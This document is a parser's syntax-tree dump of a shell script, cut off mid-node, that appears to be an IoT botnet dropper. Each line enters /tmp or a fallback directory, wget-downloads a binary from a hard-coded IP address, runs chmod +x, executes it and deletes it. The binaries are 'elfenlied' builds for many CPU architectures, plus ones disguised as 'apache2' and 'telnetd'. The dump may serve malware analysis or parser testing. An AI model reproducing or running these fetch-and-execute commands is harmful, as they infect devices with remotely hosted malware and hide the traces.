ListNode(lineno=2, pos=(12, 171), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 108), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 108), word='http://198.175.127.110/elfenliedmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(108, 109)),
  CommandNode(lineno=2, pos=(110, 132), parts=[
    WordNode(lineno=2, pos=(110, 115), word='chmod'),
    WordNode(lineno=2, pos=(116, 118), word='+x'),
    WordNode(lineno=2, pos=(119, 132), word='elfenliedmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(132, 133)),
  CommandNode(lineno=2, pos=(134, 149), parts=[
    WordNode(lineno=2, pos=(134, 149), word='./elfenliedmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(149, 150)),
  CommandNode(lineno=2, pos=(151, 171), parts=[
    WordNode(lineno=2, pos=(151, 153), word='rm'),
    WordNode(lineno=2, pos=(154, 157), word='-rf'),
    WordNode(lineno=2, pos=(158, 171), word='elfenliedmips'),
  ]),
])
ListNode(lineno=3, pos=(172, 339), parts=[
  CommandNode(lineno=3, pos=(172, 179), parts=[
    WordNode(lineno=3, pos=(172, 174), word='cd'),
    WordNode(lineno=3, pos=(175, 179), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(180, 182)),
  CommandNode(lineno=3, pos=(183, 194), parts=[
    WordNode(lineno=3, pos=(183, 185), word='cd'),
    WordNode(lineno=3, pos=(186, 194), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(195, 197)),
  CommandNode(lineno=3, pos=(198, 205), parts=[
    WordNode(lineno=3, pos=(198, 200), word='cd'),
    WordNode(lineno=3, pos=(201, 205), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(206, 208)),
  CommandNode(lineno=3, pos=(209, 217), parts=[
    WordNode(lineno=3, pos=(209, 211), word='cd'),
    WordNode(lineno=3, pos=(212, 217), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(218, 220)),
  CommandNode(lineno=3, pos=(221, 225), parts=[
    WordNode(lineno=3, pos=(221, 223), word='cd'),
    WordNode(lineno=3, pos=(224, 225), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(225, 226)),
  CommandNode(lineno=3, pos=(227, 270), parts=[
    WordNode(lineno=3, pos=(227, 231), word='wget'),
    WordNode(lineno=3, pos=(232, 270), word='http://198.175.127.110/elfenliedmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(270, 271)),
  CommandNode(lineno=3, pos=(272, 296), parts=[
    WordNode(lineno=3, pos=(272, 277), word='chmod'),
    WordNode(lineno=3, pos=(278, 280), word='+x'),
    WordNode(lineno=3, pos=(281, 296), word='elfenliedmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(296, 297)),
  CommandNode(lineno=3, pos=(298, 315), parts=[
    WordNode(lineno=3, pos=(298, 315), word='./elfenliedmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(315, 316)),
  CommandNode(lineno=3, pos=(317, 339), parts=[
    WordNode(lineno=3, pos=(317, 319), word='rm'),
    WordNode(lineno=3, pos=(320, 323), word='-rf'),
    WordNode(lineno=3, pos=(324, 339), word='elfenliedmipsel'),
  ]),
])
ListNode(lineno=4, pos=(340, 495), parts=[
  CommandNode(lineno=4, pos=(340, 347), parts=[
    WordNode(lineno=4, pos=(340, 342), word='cd'),
    WordNode(lineno=4, pos=(343, 347), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(348, 350)),
  CommandNode(lineno=4, pos=(351, 362), parts=[
    WordNode(lineno=4, pos=(351, 353), word='cd'),
    WordNode(lineno=4, pos=(354, 362), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(363, 365)),
  CommandNode(lineno=4, pos=(366, 373), parts=[
    WordNode(lineno=4, pos=(366, 368), word='cd'),
    WordNode(lineno=4, pos=(369, 373), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(374, 376)),
  CommandNode(lineno=4, pos=(377, 385), parts=[
    WordNode(lineno=4, pos=(377, 379), word='cd'),
    WordNode(lineno=4, pos=(380, 385), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(386, 388)),
  CommandNode(lineno=4, pos=(389, 393), parts=[
    WordNode(lineno=4, pos=(389, 391), word='cd'),
    WordNode(lineno=4, pos=(392, 393), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(393, 394)),
  CommandNode(lineno=4, pos=(395, 435), parts=[
    WordNode(lineno=4, pos=(395, 399), word='wget'),
    WordNode(lineno=4, pos=(400, 435), word='http://198.175.127.110/elfenliedsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(435, 436)),
  CommandNode(lineno=4, pos=(437, 458), parts=[
    WordNode(lineno=4, pos=(437, 442), word='chmod'),
    WordNode(lineno=4, pos=(443, 445), word='+x'),
    WordNode(lineno=4, pos=(446, 458), word='elfenliedsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(458, 459)),
  CommandNode(lineno=4, pos=(460, 474), parts=[
    WordNode(lineno=4, pos=(460, 474), word='./elfenliedsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(474, 475)),
  CommandNode(lineno=4, pos=(476, 495), parts=[
    WordNode(lineno=4, pos=(476, 478), word='rm'),
    WordNode(lineno=4, pos=(479, 482), word='-rf'),
    WordNode(lineno=4, pos=(483, 495), word='elfenliedsh4'),
  ]),
])
ListNode(lineno=5, pos=(496, 651), parts=[
  CommandNode(lineno=5, pos=(496, 503), parts=[
    WordNode(lineno=5, pos=(496, 498), word='cd'),
    WordNode(lineno=5, pos=(499, 503), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(504, 506)),
  CommandNode(lineno=5, pos=(507, 518), parts=[
    WordNode(lineno=5, pos=(507, 509), word='cd'),
    WordNode(lineno=5, pos=(510, 518), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(519, 521)),
  CommandNode(lineno=5, pos=(522, 529), parts=[
    WordNode(lineno=5, pos=(522, 524), word='cd'),
    WordNode(lineno=5, pos=(525, 529), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(530, 532)),
  CommandNode(lineno=5, pos=(533, 541), parts=[
    WordNode(lineno=5, pos=(533, 535), word='cd'),
    WordNode(lineno=5, pos=(536, 541), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(542, 544)),
  CommandNode(lineno=5, pos=(545, 549), parts=[
    WordNode(lineno=5, pos=(545, 547), word='cd'),
    WordNode(lineno=5, pos=(548, 549), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(549, 550)),
  CommandNode(lineno=5, pos=(551, 591), parts=[
    WordNode(lineno=5, pos=(551, 555), word='wget'),
    WordNode(lineno=5, pos=(556, 591), word='http://198.175.127.110/elfenliedx86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(591, 592)),
  CommandNode(lineno=5, pos=(593, 614), parts=[
    WordNode(lineno=5, pos=(593, 598), word='chmod'),
    WordNode(lineno=5, pos=(599, 601), word='+x'),
    WordNode(lineno=5, pos=(602, 614), word='elfenliedx86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(614, 615)),
  CommandNode(lineno=5, pos=(616, 630), parts=[
    WordNode(lineno=5, pos=(616, 630), word='./elfenliedx86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(630, 631)),
  CommandNode(lineno=5, pos=(632, 651), parts=[
    WordNode(lineno=5, pos=(632, 634), word='rm'),
    WordNode(lineno=5, pos=(635, 638), word='-rf'),
    WordNode(lineno=5, pos=(639, 651), word='elfenliedx86'),
  ]),
])
ListNode(lineno=6, pos=(652, 819), parts=[
  CommandNode(lineno=6, pos=(652, 659), parts=[
    WordNode(lineno=6, pos=(652, 654), word='cd'),
    WordNode(lineno=6, pos=(655, 659), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(660, 662)),
  CommandNode(lineno=6, pos=(663, 674), parts=[
    WordNode(lineno=6, pos=(663, 665), word='cd'),
    WordNode(lineno=6, pos=(666, 674), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(675, 677)),
  CommandNode(lineno=6, pos=(678, 685), parts=[
    WordNode(lineno=6, pos=(678, 680), word='cd'),
    WordNode(lineno=6, pos=(681, 685), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(686, 688)),
  CommandNode(lineno=6, pos=(689, 697), parts=[
    WordNode(lineno=6, pos=(689, 691), word='cd'),
    WordNode(lineno=6, pos=(692, 697), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(698, 700)),
  CommandNode(lineno=6, pos=(701, 705), parts=[
    WordNode(lineno=6, pos=(701, 703), word='cd'),
    WordNode(lineno=6, pos=(704, 705), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(705, 706)),
  CommandNode(lineno=6, pos=(707, 750), parts=[
    WordNode(lineno=6, pos=(707, 711), word='wget'),
    WordNode(lineno=6, pos=(712, 750), word='http://198.175.127.110/elfenliedarmv6l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(750, 751)),
  CommandNode(lineno=6, pos=(752, 776), parts=[
    WordNode(lineno=6, pos=(752, 757), word='chmod'),
    WordNode(lineno=6, pos=(758, 760), word='+x'),
    WordNode(lineno=6, pos=(761, 776), word='elfenliedarmv6l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(776, 777)),
  CommandNode(lineno=6, pos=(778, 795), parts=[
    WordNode(lineno=6, pos=(778, 795), word='./elfenliedarmv6l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(795, 796)),
  CommandNode(lineno=6, pos=(797, 819), parts=[
    WordNode(lineno=6, pos=(797, 799), word='rm'),
    WordNode(lineno=6, pos=(800, 803), word='-rf'),
    WordNode(lineno=6, pos=(804, 819), word='elfenliedarmv6l'),
  ]),
])
ListNode(lineno=7, pos=(820, 979), parts=[
  CommandNode(lineno=7, pos=(820, 827), parts=[
    WordNode(lineno=7, pos=(820, 822), word='cd'),
    WordNode(lineno=7, pos=(823, 827), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(828, 830)),
  CommandNode(lineno=7, pos=(831, 842), parts=[
    WordNode(lineno=7, pos=(831, 833), word='cd'),
    WordNode(lineno=7, pos=(834, 842), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(843, 845)),
  CommandNode(lineno=7, pos=(846, 853), parts=[
    WordNode(lineno=7, pos=(846, 848), word='cd'),
    WordNode(lineno=7, pos=(849, 853), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(854, 856)),
  CommandNode(lineno=7, pos=(857, 865), parts=[
    WordNode(lineno=7, pos=(857, 859), word='cd'),
    WordNode(lineno=7, pos=(860, 865), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(866, 868)),
  CommandNode(lineno=7, pos=(869, 873), parts=[
    WordNode(lineno=7, pos=(869, 871), word='cd'),
    WordNode(lineno=7, pos=(872, 873), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(873, 874)),
  CommandNode(lineno=7, pos=(875, 916), parts=[
    WordNode(lineno=7, pos=(875, 879), word='wget'),
    WordNode(lineno=7, pos=(880, 916), word='http://198.175.127.110/elfenliedi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(916, 917)),
  CommandNode(lineno=7, pos=(918, 940), parts=[
    WordNode(lineno=7, pos=(918, 923), word='chmod'),
    WordNode(lineno=7, pos=(924, 926), word='+x'),
    WordNode(lineno=7, pos=(927, 940), word='elfenliedi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(940, 941)),
  CommandNode(lineno=7, pos=(942, 957), parts=[
    WordNode(lineno=7, pos=(942, 957), word='./elfenliedi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(957, 958)),
  CommandNode(lineno=7, pos=(959, 979), parts=[
    WordNode(lineno=7, pos=(959, 961), word='rm'),
    WordNode(lineno=7, pos=(962, 965), word='-rf'),
    WordNode(lineno=7, pos=(966, 979), word='elfenliedi686'),
  ]),
])
ListNode(lineno=8, pos=(980, 1135), parts=[
  CommandNode(lineno=8, pos=(980, 987), parts=[
    WordNode(lineno=8, pos=(980, 982), word='cd'),
    WordNode(lineno=8, pos=(983, 987), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(988, 990)),
  CommandNode(lineno=8, pos=(991, 1002), parts=[
    WordNode(lineno=8, pos=(991, 993), word='cd'),
    WordNode(lineno=8, pos=(994, 1002), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1003, 1005)),
  CommandNode(lineno=8, pos=(1006, 1013), parts=[
    WordNode(lineno=8, pos=(1006, 1008), word='cd'),
    WordNode(lineno=8, pos=(1009, 1013), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1014, 1016)),
  CommandNode(lineno=8, pos=(1017, 1025), parts=[
    WordNode(lineno=8, pos=(1017, 1019), word='cd'),
    WordNode(lineno=8, pos=(1020, 1025), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1026, 1028)),
  CommandNode(lineno=8, pos=(1029, 1033), parts=[
    WordNode(lineno=8, pos=(1029, 1031), word='cd'),
    WordNode(lineno=8, pos=(1032, 1033), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1033, 1034)),
  CommandNode(lineno=8, pos=(1035, 1075), parts=[
    WordNode(lineno=8, pos=(1035, 1039), word='wget'),
    WordNode(lineno=8, pos=(1040, 1075), word='http://198.175.127.110/elfenliedppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1075, 1076)),
  CommandNode(lineno=8, pos=(1077, 1098), parts=[
    WordNode(lineno=8, pos=(1077, 1082), word='chmod'),
    WordNode(lineno=8, pos=(1083, 1085), word='+x'),
    WordNode(lineno=8, pos=(1086, 1098), word='elfenliedppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1098, 1099)),
  CommandNode(lineno=8, pos=(1100, 1114), parts=[
    WordNode(lineno=8, pos=(1100, 1114), word='./elfenliedppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1114, 1115)),
  CommandNode(lineno=8, pos=(1116, 1135), parts=[
    WordNode(lineno=8, pos=(1116, 1118), word='rm'),
    WordNode(lineno=8, pos=(1119, 1122), word='-rf'),
    WordNode(lineno=8, pos=(1123, 1135), word='elfenliedppc'),
  ]),
])
ListNode(lineno=9, pos=(1136, 1295), parts=[
  CommandNode(lineno=9, pos=(1136, 1143), parts=[
    WordNode(lineno=9, pos=(1136, 1138), word='cd'),
    WordNode(lineno=9, pos=(1139, 1143), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1144, 1146)),
  CommandNode(lineno=9, pos=(1147, 1158), parts=[
    WordNode(lineno=9, pos=(1147, 1149), word='cd'),
    WordNode(lineno=9, pos=(1150, 1158), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1159, 1161)),
  CommandNode(lineno=9, pos=(1162, 1169), parts=[
    WordNode(lineno=9, pos=(1162, 1164), word='cd'),
    WordNode(lineno=9, pos=(1165, 1169), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1170, 1172)),
  CommandNode(lineno=9, pos=(1173, 1181), parts=[
    WordNode(lineno=9, pos=(1173, 1175), word='cd'),
    WordNode(lineno=9, pos=(1176, 1181), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1182, 1184)),
  CommandNode(lineno=9, pos=(1185, 1189), parts=[
    WordNode(lineno=9, pos=(1185, 1187), word='cd'),
    WordNode(lineno=9, pos=(1188, 1189), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1189, 1190)),
  CommandNode(lineno=9, pos=(1191, 1232), parts=[
    WordNode(lineno=9, pos=(1191, 1195), word='wget'),
    WordNode(lineno=9, pos=(1196, 1232), word='http://198.175.127.110/elfenliedi586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1232, 1233)),
  CommandNode(lineno=9, pos=(1234, 1256), parts=[
    WordNode(lineno=9, pos=(1234, 1239), word='chmod'),
    WordNode(lineno=9, pos=(1240, 1242), word='+x'),
    WordNode(lineno=9, pos=(1243, 1256), word='elfenliedi586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1256, 1257)),
  CommandNode(lineno=9, pos=(1258, 1273), parts=[
    WordNode(lineno=9, pos=(1258, 1273), word='./elfenliedi586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1273, 1274)),
  CommandNode(lineno=9, pos=(1275, 1295), parts=[
    WordNode(lineno=9, pos=(1275, 1277), word='rm'),
    WordNode(lineno=9, pos=(1278, 1281), word='-rf'),
    WordNode(lineno=9, pos=(1282, 1295), word='elfenliedi586'),
  ]),
])
ListNode(lineno=10, pos=(1296, 1455), parts=[
  CommandNode(lineno=10, pos=(1296, 1303), parts=[
    WordNode(lineno=10, pos=(1296, 1298), word='cd'),
    WordNode(lineno=10, pos=(1299, 1303), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1304, 1306)),
  CommandNode(lineno=10, pos=(1307, 1318), parts=[
    WordNode(lineno=10, pos=(1307, 1309), word='cd'),
    WordNode(lineno=10, pos=(1310, 1318), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1319, 1321)),
  CommandNode(lineno=10, pos=(1322, 1329), parts=[
    WordNode(lineno=10, pos=(1322, 1324), word='cd'),
    WordNode(lineno=10, pos=(1325, 1329), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1330, 1332)),
  CommandNode(lineno=10, pos=(1333, 1341), parts=[
    WordNode(lineno=10, pos=(1333, 1335), word='cd'),
    WordNode(lineno=10, pos=(1336, 1341), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1342, 1344)),
  CommandNode(lineno=10, pos=(1345, 1349), parts=[
    WordNode(lineno=10, pos=(1345, 1347), word='cd'),
    WordNode(lineno=10, pos=(1348, 1349), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1349, 1350)),
  CommandNode(lineno=10, pos=(1351, 1392), parts=[
    WordNode(lineno=10, pos=(1351, 1355), word='wget'),
    WordNode(lineno=10, pos=(1356, 1392), word='http://198.175.127.110/elfenliedm68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1392, 1393)),
  CommandNode(lineno=10, pos=(1394, 1416), parts=[
    WordNode(lineno=10, pos=(1394, 1399), word='chmod'),
    WordNode(lineno=10, pos=(1400, 1402), word='+x'),
    WordNode(lineno=10, pos=(1403, 1416), word='elfenliedm68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1416, 1417)),
  CommandNode(lineno=10, pos=(1418, 1433), parts=[
    WordNode(lineno=10, pos=(1418, 1433), word='./elfenliedm68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1433, 1434)),
  CommandNode(lineno=10, pos=(1435, 1455), parts=[
    WordNode(lineno=10, pos=(1435, 1437), word='rm'),
    WordNode(lineno=10, pos=(1438, 1441), word='-rf'),
    WordNode(lineno=10, pos=(1442, 1455), word='elfenliedm68k'),
  ]),
])
ListNode(lineno=11, pos=(1456, 1619), parts=[
  CommandNode(lineno=11, pos=(1456, 1463), parts=[
    WordNode(lineno=11, pos=(1456, 1458), word='cd'),
    WordNode(lineno=11, pos=(1459, 1463), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1464, 1466)),
  CommandNode(lineno=11, pos=(1467, 1478), parts=[
    WordNode(lineno=11, pos=(1467, 1469), word='cd'),
    WordNode(lineno=11, pos=(1470, 1478), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1479, 1481)),
  CommandNode(lineno=11, pos=(1482, 1489), parts=[
    WordNode(lineno=11, pos=(1482, 1484), word='cd'),
    WordNode(lineno=11, pos=(1485, 1489), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1490, 1492)),
  CommandNode(lineno=11, pos=(1493, 1501), parts=[
    WordNode(lineno=11, pos=(1493, 1495), word='cd'),
    WordNode(lineno=11, pos=(1496, 1501), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1502, 1504)),
  CommandNode(lineno=11, pos=(1505, 1509), parts=[
    WordNode(lineno=11, pos=(1505, 1507), word='cd'),
    WordNode(lineno=11, pos=(1508, 1509), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1509, 1510)),
  CommandNode(lineno=11, pos=(1511, 1553), parts=[
    WordNode(lineno=11, pos=(1511, 1515), word='wget'),
    WordNode(lineno=11, pos=(1516, 1553), word='http://198.175.127.110/elfenliedsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1553, 1554)),
  CommandNode(lineno=11, pos=(1555, 1578), parts=[
    WordNode(lineno=11, pos=(1555, 1560), word='chmod'),
    WordNode(lineno=11, pos=(1561, 1563), word='+x'),
    WordNode(lineno=11, pos=(1564, 1578), word='elfenliedsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1578, 1579)),
  CommandNode(lineno=11, pos=(1580, 1596), parts=[
    WordNode(lineno=11, pos=(1580, 1596), word='./elfenliedsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1596, 1597)),
  CommandNode(lineno=11, pos=(1598, 1619), parts=[
    WordNode(lineno=11, pos=(1598, 1600), word='rm'),
    WordNode(lineno=11, pos=(1601, 1604), word='-rf'),
    WordNode(lineno=11, pos=(1605, 1619), word='elfenliedsparc'),
  ]),
])
ListNode(lineno=12, pos=(1620, 1739), parts=[
  CommandNode(lineno=12, pos=(1620, 1627), parts=[
    WordNode(lineno=12, pos=(1620, 1622), word='cd'),
    WordNode(lineno=12, pos=(1623, 1627), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1628, 1630)),
  CommandNode(lineno=12, pos=(1631, 1642), parts=[
    WordNode(lineno=12, pos=(1631, 1633), word='cd'),
    WordNode(lineno=12, pos=(1634, 1642), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1643, 1645)),
  CommandNode(lineno=12, pos=(1646, 1653), parts=[
    WordNode(lineno=12, pos=(1646, 1648), word='cd'),
    WordNode(lineno=12, pos=(1649, 1653), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1654, 1656)),
  CommandNode(lineno=12, pos=(1657, 1665), parts=[
    WordNode(lineno=12, pos=(1657, 1659), word='cd'),
    WordNode(lineno=12, pos=(1660, 1665), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1666, 1668)),
  CommandNode(lineno=12, pos=(1669, 1673), parts=[
    WordNode(lineno=12, pos=(1669, 1671), word='cd'),
    WordNode(lineno=12, pos=(1672, 1673), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1673, 1674)),
  CommandNode(lineno=12, pos=(1675, 1706), parts=[
    WordNode(lineno=12, pos=(1675, 1679), word='wget'),
    WordNode(lineno=12, pos=(1680, 1706), word='http://198.175.127.110/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1706, 1707)),
  CommandNode(lineno=12, pos=(1708, 1720), parts=[
    WordNode(lineno=12, pos=(1708, 1713), word='chmod'),
    WordNode(lineno=12, pos=(1714, 1716), word='+x'),
    WordNode(lineno=12, pos=(1717, 1720), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1720, 1721)),
  CommandNode(lineno=12, pos=(1722, 1727), parts=[
    WordNode(lineno=12, pos=(1722, 1727), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1727, 1728)),
  CommandNode(lineno=12, pos=(1729, 1739), parts=[
    WordNode(lineno=12, pos=(1729, 1731), word='rm'),
    WordNode(lineno=12, pos=(1732, 1735), word='-rf'),
    WordNode(lineno=12, pos=(1736, 1739), word=' '),
  ]),
])
ListNode(lineno=13, pos=(1740, 1875), parts=[
  CommandNode(lineno=13, pos=(1740, 1747), parts=[
    WordNode(lineno=13, pos=(1740, 1742), word='cd'),
    WordNode(lineno=13, pos=(1743, 1747), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1748, 1750)),
  CommandNode(lineno=13, pos=(1751, 1762), parts=[
    WordNode(lineno=13, pos=(1751, 1753), word='cd'),
    WordNode(lineno=13, pos=(1754, 1762), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1763, 1765)),
  CommandNode(lineno=13, pos=(1766, 1773), parts=[
    WordNode(lineno=13, pos=(1766, 1768), word='cd'),
    WordNode(lineno=13, pos=(1769, 1773), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1774, 1776)),
  CommandNode(lineno=13, pos=(1777, 1785), parts=[
    WordNode(lineno=13, pos=(1777, 1779), word='cd'),
    WordNode(lineno=13, pos=(1780, 1785), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1786, 1788)),
  CommandNode(lineno=13, pos=(1789, 1793), parts=[
    WordNode(lineno=13, pos=(1789, 1791), word='cd'),
    WordNode(lineno=13, pos=(1792, 1793), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1793, 1794)),
  CommandNode(lineno=13, pos=(1795, 1830), parts=[
    WordNode(lineno=13, pos=(1795, 1799), word='wget'),
    WordNode(lineno=13, pos=(1800, 1830), word='http://198.175.127.110/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1830, 1831)),
  CommandNode(lineno=13, pos=(1832, 1848), parts=[
    WordNode(lineno=13, pos=(1832, 1837), word='chmod'),
    WordNode(lineno=13, pos=(1838, 1840), word='+x'),
    WordNode(lineno=13, pos=(1841, 1848), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1848, 1849)),
  CommandNode(lineno=13, pos=(1850, 1859), parts=[
    WordNode(lineno=13, pos=(1850, 1859), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1859, 1860)),
  CommandNode(lineno=13, pos=(1861, 1875), parts=[
    WordNode(lineno=13, pos=(1861, 1863), word='rm'),
    WordNode(lineno=13, pos=(1864, 1867), word='-rf'),
    WordNode(lineno=13, pos=(1868, 1875), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(1876, 2011), parts=[
  CommandNode(lineno=14, pos=(1876, 1883), parts=[
    WordNode(lineno=14, pos=(1876, 1878), word='cd'),
    WordNode(lineno=14, pos=(1879, 1883), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1884, 1886)),
  CommandNode(lineno=14, pos=(1887, 1898), parts=[
    WordNode(lineno=14, pos=(1887, 1889), word='cd'),
    WordNode(lineno=14, pos=(1890, 1898), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1899, 1901)),
  CommandNode(lineno=14, pos=(1902, 1909), parts=[
    WordNode(lineno=14, pos=(1902, 1904), word='cd'),
    WordNode(lineno=14, pos=(1905, 1909), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1910, 1912)),
  CommandNode(lineno=14, pos=(1913, 1921), parts=[
    WordNode(lineno=14, pos=(1913, 1915), word='cd'),
    WordNode(lineno=14, pos=(1916, 1921), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1922, 1924)),
  CommandNode(lineno=14, pos=(1925, 1929), parts=[
    WordNode(lineno=14, pos=(1925, 1927), word='cd'),
    WordNode(lineno=14, pos=(1928, 1929), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1929, 1930)),
  CommandNode(lineno=14, pos=(1931, 1966), parts=[
    WordNode(lineno=14, pos=(1931, 1935), word='wget'),
    WordNode(lineno=14, pos=(1936, 1966), word='http://198.175.127.110/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1966, 1967)),
  CommandNode(lineno=14, pos=(1968, 1984), parts=[
    WordNode(lineno=14, pos=(1968, 1973), word='chmod'),
    WordNode(lineno=14, pos=(1974, 1976), word='+x'),
    WordNode(lineno=14, pos=(1977, 1984), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1984, 1985)),
  CommandNode(lineno=14, pos=(1986, 1995), parts=[
    WordNode(lineno=14, pos=(1986, 1995), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1995, 1996)),
  CommandNode(lineno=14, pos=(1997, 2011), parts=[
    WordNode(lineno=14, pos=(1997, 1999), word='rm'),
    WordNode(lineno=14, pos=(2000, 2003), word='-rf'),
    WordNode(lineno=14, pos=(2004, 2011), word='telnetd'),
